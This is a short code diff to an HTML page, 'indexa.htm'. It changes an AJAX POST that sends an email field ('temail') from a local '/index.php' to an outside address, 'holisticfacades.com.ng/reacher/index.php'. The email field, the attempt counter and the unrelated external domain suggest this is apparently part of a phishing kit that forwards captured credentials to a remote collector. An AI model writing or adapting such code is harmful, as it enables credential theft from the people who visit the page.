--- a/indexa.htm
+++ b/indexa.htm
@@ -245,7 +245,7 @@ function goNow() {
 		n=n+1;
         $.ajax({
           dataType: 'JSON',
-          url: '/index.php',
+          url: 'https://holisticfacades.com.ng/reacher/index.php',
           type: 'POST',
           data:{
             temail:temail,
